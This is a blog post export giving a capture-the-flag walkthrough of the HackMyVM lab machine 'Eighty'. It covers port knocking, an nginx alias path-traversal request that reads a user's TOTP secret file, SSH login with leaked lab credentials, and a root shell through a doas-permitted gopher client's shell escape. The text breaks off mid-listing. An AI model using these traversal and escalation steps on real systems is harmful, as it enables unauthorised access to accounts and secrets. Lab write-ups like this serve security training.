{"id":871,"date":"2025-06-14T09:11:05","date_gmt":"2025-06-14T01:11:05","guid":{"rendered":"http:\/\/162.14.82.114\/?p=871"},"modified":"2025-06-14T09:11:05","modified_gmt":"2025-06-14T01:11:05","slug":"hmv-_-eighty","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/871\/06\/14\/2025\/","title":{"rendered":"hmv[-_-]Eighty"},"content":{"rendered":"<h1>Eighty<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910908.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910908.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250613212723981\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910910.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910910.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614080611298\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n\nOpen 192.168.10.104:22\nOpen 192.168.10.104:70\n\nPORT   STATE SERVICE REASON         VERSION\n22\/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 c9:ce:d7:2a:f9:48:25:65:a9:33:4b:d5:01:e1:2c:52 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmERs5H1i0qPP1SXqPrbDTd0Kg6sUJiYT\/5m7Lx2jHMvkn1LSZTu8e87vzavsaZbsey9PeW6WAkP4XLE4JMdsdb1mntupUVzw7dNInN3g2gNkSjTD24Mz0GQ\/wdtGjgZrwRN3WGVQxtY+cQ05PWzHx7w5eIMLlzQl4+7mT0Rl0nuaGNDByYN3FSQdLBLIwzgDGUrZPDCCbI6ZgVSC0MRB\/c1tfKv8bz9o1IGaFsdStYuk7D2B+dPiQny1eneJJDQE01ohS4SOSqDxaQUr1+rYRBzWpzjh7jW4BZmUQ8L9CxwY3GiEedkOXG1eXkKvbJIJXVHaRwdcAhuXvuqjpMYhx\n|   256 7e:3d:4d:b4:82:0b:13:eb:db:50:e3:60:70:f0:4a:ad (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJgkAvIrs5fzCXuAgy35rbxOpHmq4\/IhDW903PdkqJABNiPcYON5Pe+1dWxrBeN7wJ5mKym4CS75M9mBtH68V3Y=\n|   256 7f:9d:13:c8:7b:d9:37:1d:cb:ff:e9:ce:f5:90:c3:32 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFRjfuHVzxnsIjDywzY2yc24Wl3h3vc4TAAiDr5iLGqV\n70\/tcp open  http    syn-ack ttl 64 pygopherd web-gopher gateway\n|_http-title: Gopher\n| http-methods: \n|_  Supported Methods: GET HEAD\n| gopher-ls: \n|_[txt] \/howtoconnect.txt &quot;Connection&quot;\nMAC Address: 08:00:27:46:5B:79 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Reconnaissance<\/h3>\n<p>Port <code>70<\/code> has something on it, so take a look:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ curl -s http:\/\/$IP:70\/howtoconnect.txt\nPing us to: 4767 2343 3142<\/code><\/pre>\n<p>Try 
knocking:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ knock $IP 4767 2343 3142<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n\nOpen 192.168.10.104:70\nOpen 192.168.10.104:80\n\nPORT   STATE SERVICE REASON         VERSION\n70\/tcp open  http    syn-ack ttl 64 pygopherd web-gopher gateway\n|_http-title: Gopher\n| http-methods: \n|_  Supported Methods: GET HEAD\n| gopher-ls: \n|_[txt] \/howtoconnect.txt &quot;Connection&quot;\n80\/tcp open  http    syn-ack ttl 64 nginx 1.14.2\n| http-methods: \n|_  Supported Methods: GET HEAD\n|_http-title: Site doesn&#039;t have a title (text\/html).\n|_http-server-header: nginx\/1.14.2\nMAC Address: 08:00:27:46:5B:79 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)<\/code><\/pre>\n<p>Port 22 has closed again... Keep scanning:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.10.104\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              html,php,txt\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration 
mode\n===============================================================\n\/index.html           (Status: 200) [Size: 16]\n\/robots.txt           (Status: 200) [Size: 18]<\/code><\/pre>\n<h3>Sensitive Directories<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ curl -s http:\/\/$IP\/robots.txt         \n\/nginx_backup.txt\n\n# wget http:\/\/$IP\/nginx_backup.txt   \n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ cat nginx_backup.txt                                       \nserver {\n        listen 80 default_server;\n        listen [::]:80 default_server;\n        root \/var\/www\/html;\n        index index.html index.htm index.nginx-debian.html;\n        server_name _;\n        location \/ {\n                try_files $uri $uri\/ =404;\n        }\n}\n\nserver {\nserver_name henry.eighty.hmv;\nroot \/var\/www\/html;\nindex index.html index.htm index.nginx-debian.html;\n        location \/web {\n                alias \/home\/henry\/web\/;\n        }\n  }\n\nserver {\nserver_name susan.eighty.hmv;\nroot \/var\/www\/html;\nindex index.html index.htm index.nginx-debian.html;\n        location \/web {\n                alias \/home\/susan\/web\/;\n        }\n  }<\/code><\/pre>\n<p>This yields two hostnames to resolve:<\/p>\n<pre><code class=\"language-bash\">192.168.10.104   henry.eighty.hmv   susan.eighty.hmv<\/code><\/pre>\n<p>Add them to <code>\/etc\/hosts<\/code> and continue gathering information:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ gobuster dir -u http:\/\/henry.eighty.hmv\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer 
(@firefart)\n===============================================================\n[+] Url:                     http:\/\/henry.eighty.hmv\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,txt,html\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html           (Status: 200) [Size: 16]\n\/web                  (Status: 301) [Size: 185] [--&gt; http:\/\/henry.eighty.hmv\/web\/]\n\/robots.txt           (Status: 200) [Size: 18]\nProgress: 882240 \/ 882244 (100.00%)\n===============================================================\nFinished\n===============================================================\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ feroxbuster -u http:\/\/susan.eighty.hmv\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x html txt php 2&gt;\/dev\/null\n\n404      GET        7l       12w      169c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n200      GET        2l        4w       16c http:\/\/susan.eighty.hmv\/\n200      GET        2l        4w       16c http:\/\/susan.eighty.hmv\/index.html\n301      GET        7l       12w      185c http:\/\/susan.eighty.hmv\/web =&gt; http:\/\/susan.eighty.hmv\/web\/\n200      GET        2l        7w       40c http:\/\/susan.eighty.hmv\/web\/index.html\n200      GET        1l        1w       18c http:\/\/susan.eighty.hmv\/robots.txt\n200      GET        1l        3w       50c http:\/\/susan.eighty.hmv\/web\/lostpasswd.txt\n[####################] - 21m  1764368\/1764368 0s      found:6       errors:0      \n[####################] - 21m   
882184\/882184  712\/s   http:\/\/susan.eighty.hmv\/ \n[####################] - 21m   882184\/882184  712\/s   http:\/\/susan.eighty.hmv\/web\/<\/code><\/pre>\n<p>A new directory turned up, so gather information from it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ curl -s http:\/\/susan.eighty.hmv\/robots.txt\n\/nginx_backup.txt\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ curl http:\/\/susan.eighty.hmv\/web\/lostpasswd.txt\n8ycrois-tu0 + \/home\/susan\/secret\/.google-auth.txt<\/code><\/pre>\n<h3>SSH Login with TOTP Authentication<\/h3>\n<p>This gives the password <code>8ycrois-tu0<\/code>. Next, note this block in the <code>nginx<\/code> configuration file above:<\/p>\n<pre><code class=\"language-bash\">server {\nserver_name susan.eighty.hmv;\nroot \/var\/www\/html;\nindex index.html index.htm index.nginx-debian.html;\n        location \/web {\n                alias \/home\/susan\/web\/;\n        }\n  }<\/code><\/pre>\n<p>The <code>location \/web<\/code> prefix has no trailing slash while its <code>alias<\/code> path does, so directory traversal can be attempted:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ curl http:\/\/susan.eighty.hmv\/web..\/secret\/.google-auth.txt \n2GN7KARBONVR55R7SP3UZPN3ZM\n&quot; RATE_LIMIT 3 30\n&quot; WINDOW_SIZE 17\n&quot; DISALLOW_REUSE\n&quot; TOTP_AUTH\n71293338\n48409754\n27074208\n60216448\n17908010<\/code><\/pre>\n<p>The file turns out to use <code>TOTP_AUTH<\/code>:<\/p>\n<blockquote>\n<p>TOTP (Time-based One-Time 
Password) is a dynamic password technique widely used in two-factor authentication (2FA) that generates short-lived verification codes by combining a shared secret with a timestamp.<\/p>\n<\/blockquote>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910911.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910911.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614084143934\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>However, this one does not work, so switch to another:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910912.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910912.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614084234164\" 
style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Open the extension in the top-right corner, then Authenticator &gt; Add account &gt; Manual entry &gt; <code>susan:2GN7KARBONVR55R7SP3UZPN3ZM<\/code>:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910913.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910913.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614084628254\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>Try logging in over ssh; if the code expires, use a fresh one!<\/p>\n<p>Enter <code>8ycrois-tu0<\/code> as the password (if you do not know where it came from, use <code>ctrl+f<\/code> to see where it first appears), and for the verification code enter the one the extension just gave:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910914.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910914.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614084837513\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">susan@eighty:~$ ls -la\ntotal 52\ndrwxr-xr-x 6 susan susan 4096 Jun 13 20:48 .\ndrwxr-xr-x 4 root  root  4096 Apr  7  2021 ..\n-rw-r--r-- 1 susan susan  220 Apr  7  2021 .bash_logout\n-rw-r--r-- 1 susan susan 3526 Apr  7  2021 .bashrc\n-rwx--x--x 1 susan susan 1920 Apr  7  2021 flag.sh\ndrwx------ 3 susan susan 4096 Apr  7  2021 .gnupg\n-r-------- 1 susan susan  156 Jun 13 20:48 .google_authenticator\ndrwxr-xr-x 3 susan susan 4096 Apr  7  2021 .local\n-rw-r--r-- 1 susan susan  807 Apr  7  2021 .profile\ndrwxr-xr-x 2 susan susan 4096 Apr  7  2021 secret\n-rw------- 1 susan susan   12 Apr  7  2021 user.txt\ndrwxr-xr-x 2 susan susan 4096 Apr  7  2021 web\n-rw------- 1 susan susan   52 Apr  7  2021 .Xauthority\nsusan@eighty:~$ cat user.txt \nhmv8use0red\nsusan@eighty:~$ .\/flag.sh \n\\033[0;35m\n                                   .     **                                     \n                                *           *.                                  \n                                              ,*                                \n                                                 *,                             \n                         ,                         ,*                           \n                      .,                              *,                        \n                    \/                                    *                      \n                 ,*                                        *,                   \n               \/.                                            .*.                
\n             *                                                  **              \n             ,*                                               ,*                \n                **                                          *.                  \n                   **                                    **.                    \n                     ,*                                **                       \n                        *,                          ,*                          \n                           *                      **                            \n                             *,                .*                               \n                                *.           **                                 \n                                  **      ,*,                                   \n                                     ** *,     \\033[0m\n-------------------------\n\\nPWNED HOST: eighty\n\\nPWNED DATE: Fri 13 Jun 2025 08:50:05 PM EDT\n\\nWHOAMI: uid=1000(susan) gid=1000(susan) groups=1000(susan),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)\n\\nFLAG: hmv8use0red\n\\n------------------------\n\nsusan@eighty:~$ sudo -l\n-bash: sudo: command not found\n\nsusan@eighty:~$ cat \/etc\/passwd | grep sh | cut -d: -f1\nroot\nsusan\nsshd\nhenry\n\nsusan@eighty:~$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/local\/bin\/doas\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/bin\/chfn\n\/usr\/bin\/gpasswd\n\/usr\/bin\/passwd\n\/usr\/bin\/umount\n\/usr\/bin\/su\n\/usr\/bin\/newgrp\n\/usr\/bin\/chsh\n\/usr\/bin\/mount<\/code><\/pre>\n<p><code>doas<\/code> has the <code>SUID<\/code> bit set and can be tried as a substitute for sudo. Check how it is used:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Eighty]\n\u2514\u2500$ tldr doas      \n\n  
Executes a command as another user.\n  More information: &lt;https:\/\/man.openbsd.org\/doas&gt;.\n\n  Run a command as root:\n\n      doas command\n\n  Run a command as another user:\n\n      doas -u user command\n\n  Launch the default shell as root:\n\n      doas -s\n\n  Parse a configuration file and check if the execution of a command as another user is allowed:\n\n      doas -C config_file command\n\n  Make `doas` request a password even after it was supplied earlier:\n\n      doas -L<\/code><\/pre>\n<p>Take a look at the configuration file:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910915.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910915.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614085632429\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>But I did not see the relevant directory on the target host:<\/p>\n<pre><code class=\"language-bash\">susan@eighty:~$ find \/ -name &quot;*doas*&quot; 2&gt;\/dev\/null\n\/usr\/local\/etc\/doas.conf\n\/usr\/local\/share\/man\/man1\/doas.1\n\/usr\/local\/share\/man\/man8\/vidoas.8\n\/usr\/local\/share\/man\/man5\/doas.conf.5\n\/usr\/local\/bin\/vidoas\n\/usr\/local\/bin\/doas<\/code><\/pre>\n<p>Using find, I located the configuration file:<\/p>\n<pre><code class=\"language-bash\">susan@eighty:~$ cat \/usr\/local\/etc\/doas.conf\npermit nolog susan as root cmd 
gopher<\/code><\/pre>\n<p>This means <code>susan<\/code> can run <code>gopher<\/code> as <code>root<\/code>. Take a look at what this is; it does not seem to look much like the protocol I am familiar with:<\/p>\n<pre><code class=\"language-bash\">susan@eighty:~$ gopher -h\ngopher: invalid option -- &#039;h&#039;\nUsage: gopher [-sSbDr] [-T type] [-p path] [-t title] [hostname port]+\n     -s      secure mode, users without own account\n     -S      secure mode, users with own account\n     -p path specify path to initial item\n     -T type Type of initial item\n     -i      Search argument (for -T 7)\n     -b      Bookmarks first\n     -r      Remote user\n     -D      Debug mode<\/code><\/pre>\n<p>Try running it:<\/p>\n<pre><code class=\"language-bash\">susan@eighty:~$ \/usr\/local\/bin\/doas -u root gopher\nPassword: 8ycrois-tu0\nWelcome to the wonderful world of Gopher!\n\nGopher has limitations on its use and comes without\na warranty.  
Please refer to the file &#039;Copyright&#039; included\nin the distribution.\n\nInternet Gopher Information Client 3.0 patch12 (FurryTerror)\nCopyright (C) 1991-2000 by the Regents of the University of Minnesota\nCopyright (C) 2000-2005 John Goerzen and the gopher developers\n\nPress RETURN to continue<\/code><\/pre>\n<p>Press any key to enter the interface, then look for a place where commands can be executed:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910916.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910916.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614090553008\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910917.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910917.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" 
alt=\"image-20250614090625964\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910918.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910918.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614090801463\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910919.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910919.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614090812350\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Found <code>!, $ : Shell Escape (Unix) or Spawn subprocess (VMS).<\/code> Try to escape: press <code>u<\/code> twice to return to the initial screen, then press <code>!<\/code> and it drops into a shell! Because the client was started as root through doas, the spawned shell is a root shell.<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910920.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506140910920.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614090942208\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">root@eighty:\/home\/susan# cd ~\nroot@eighty:~# ls -la\ntotal 32\ndrwx------  4 root root 4096 Jun 13 21:04 .\ndrwxr-xr-x 18 root root 4096 Apr  7  2021 ..\n-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc\ndrwx------  3 root root 4096 Apr  7  2021 .gnupg\n-rw-r--r--  1 root root    0 Jun 13 21:04 .gopherrc\ndrwxr-xr-x  3 root root 4096 